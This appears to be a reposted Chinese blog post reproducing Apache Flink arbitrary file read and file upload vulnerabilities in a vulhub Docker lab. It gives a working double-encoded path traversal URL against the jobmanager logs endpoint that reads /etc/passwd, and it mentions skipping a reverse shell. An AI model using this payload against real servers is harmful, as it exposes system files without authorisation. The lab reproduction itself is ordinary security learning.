apache flink任意文件读取&文件上传漏洞复现

本文转载自查看原文 2021-07-09 15:43 133 web安全

vvulhub搭建

docker-compose up -d

访问8081端口，进入控制面板

任意文件读取exp

http:/x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

文件上传

------------------

本来还想试一下反弹shell，但是因为docker环境部署在了公网ip上，反弹shell比较麻烦，就不再试了

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 Apache Solr任意文件读取漏洞复现致远OA任意文件上传漏洞复现任意文件上传漏洞任意文件读取和上传漏洞复现 - Tomcat任意文件上传漏洞（CVE-2017-12615）通达OA 任意文件上传+文件包含导致RCE漏洞复现 ThinkAdminV6未授权列目录、任意文件读取漏洞复现 FFmpeg任意文件读取漏洞分析（CVE-2021-21972） VM vCenter任意文件上传漏洞复现 WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现